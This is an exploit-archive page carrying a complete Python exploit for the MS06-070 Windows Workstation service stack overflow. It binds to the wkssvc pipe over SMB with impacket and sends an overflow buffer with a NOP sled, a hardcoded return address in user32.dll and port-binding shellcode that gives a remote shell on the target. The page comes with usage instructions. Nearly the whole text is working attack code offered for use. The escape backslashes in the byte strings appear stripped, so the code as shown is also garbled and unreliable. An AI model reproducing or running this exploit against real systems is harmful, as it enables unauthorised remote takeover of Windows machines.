[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : MS Windows NetpManageIPCConnect Stack Overflow Exploit (py)
# Published : 2006-11-18
# Author : Winny Thomas
# Previous Title : Oracle <= 9i / 10g (read/write/execute) Exploitation Suite
# Next Title : MS Windows Wkssvc NetrJoinDomain2 Stack Overflow Exploit (MS06-070)
#!/usr/bin/python
# MS06-070 Windows WorkStation NetpManageIPCConnect Vulnerability Exploit
# Tested on windows 2000 server SP4
#
# Usage: python NetAPI-NetrJoinDomain2.py <target ip> <domainname>
# Requires a domain controller on the network (configure samba as DC)
# Requires python and impacket
#
# Winny M Thomas ;-)
from impacket.dcerpc import transport
from impacket import uuid
import sys
import socket
import struct
def DCEconnectAndExploit(target, domain):
baselen = 3708
stringbinding = "ncacn_np:%(host)s[\pipe\%(pipe)s]"
stringbinding %= {'host': target,'pipe': 'wkssvc','port': 445,}
print 'Connecting to named pipe (wkssvc)'
trans = transport.DCERPCTransportFactory(stringbinding)
trans.connect()
print 'Setting up DCE transport'
dce = trans.DCERPC_class(trans)
dce.bind(uuid.uuidtup_to_bin(('6bffd098-a112-3610-9833-46c3f87e345a','1.0')))
print 'Sending attack payload to target'
#NetrJoinDomain2 data: Hostname
query1 = "xaaxbbxccxdd"
query1 += "x07x00x00x00"
query1 += "x00x00x00x00"
query1 += "x07x00x00x00"
query1 += "x5Cx00x5Cx00"
query1 += "x41x00x55x00"
query1 += "x58x00x37x00"
query1 += "x00x00x00x00"
#NetrJoinDomain2 data: Domain/Hostname
targetd = 'x00'.join(list(domain)) + 'x00'
Len = baselen + len(domain)
query2 = struct.pack('L', Len)
query2 += struct.pack('L', 0)
query2 += struct.pack('L', Len)
query2 += targetd
query3 = "x5Cx00x5Cx00x76x00x90x90"
query3 += "x90x90" * 1058
query3 += "xEBx06" #6 byte jump from current pointer in ebx
query3 += "x27x16xE1x77" #Address from user32.dll (0x77E11627)
#350 byte port binding shellcode
query3 += "x90x90x90x90x90x90"
query3 += "x33xc9x83xe9xb0xd9xeexd9x74x24xf4x5bx81x73"
query3 += "x13xe9x59x23xcex83xebxfcxe2xf4x15x33xc8x83"
query3 += "x01xa0xdcx31x16x39xa8xa2xcdx7dxa8x8bxd5xd2"
query3 += "x5fxcbx91x58xccx45xa6x41xa8x91xc9x58xc8x87"
query3 += "x62x6dxa8xcfx07x68xe3x57x45xddxe3xbaxeex98"
query3 += "xe9xc3xe8x9bxc8x3axd2x0dx07xe6x9cxbcxa8x91"
query3 += "xcdx58xc8xa8x62x55x68x45xb6x45x22x25xeax75"
query3 += "xa8x47x85x7dx3fxafx2ax68xf8xaax62x1ax13x45"
query3 += "xa9x55xa8xbexf5xf4xa8x8exe1x07x4bx40xa7x57"
query3 += "xcfx9ex16x8fx45x9dx8fx31x10xfcx81x2ex50xfc"
query3 += "xb6x0dxdcx1ex81x92xcex32xd2x09xdcx18xb6xd0"
query3 += "xc6xa8x68xb4x2bxccxbcx33x21x31x39x31xfaxc7"
query3 += "x1cxf4x74x31x3fx0ax70x9dxbax0ax60x9dxaax0a"
query3 += "xdcx1ex8fx31x32x95x8fx0axaax2fx7cx31x87xd4"
query3 += "x99x9ex74x31x3fx33x33x9fxbcxa6xf3xa6x4dxf4"
query3 += "x0dx27xbexa6xf5x9dxbcxa6xf3xa6x0cx10xa5x87"
query3 += "xbexa6xf5x9exbdx0dx76x31x39xcax4bx29x90x9f"
query3 += "x5ax99x16x8fx76x31x39x3fx49xaax8fx31x40xa3"
query3 += "x60xbcx49x9exb0x70xefx47x0ex33x67x47x0bx68"
query3 += "xe3x3dx43xa7x61xe3x17x1bx0fx5dx64x23x1bx65"
query3 += "x42xf2x4bxbcx17xeax35x31x9cx1dxdcx18xb2x0e"
query3 += "x71x9fxb8x08x49xcfxb8x08x76x9fx16x89x4bx63"
query3 += "x30x5cxedx9dx16x8fx49x31x16x6exdcx1ex62x0e"
query3 += "xdfx4dx2dx3dxdcx18xbbxa6xf3xa6x19xd3x27x91"
query3 += "xbaxa6xf5x31x39x59x23xce";
query3 += "x90x90" * 2467
query3 += "x00x00"
query3 += "x00x00x00x00"
query3 += "x00x00x00x00"
query3 += "x00x00x00x00"
query3 += "x00x00"
query3 += "x01x00x00x00"
query = query1 + query2 + query3
dce.call(0x16, query)
if __name__ == '__main__':
try:
target = sys.argv[1]
domain = sys.argv[2]
except IndexError:
print 'Usage: %s <target ip> <domain>' % sys.argv[0]
sys.exit(-1)
DCEconnectAndExploit(target, domain)
# www.Syue.com [2006-11-18]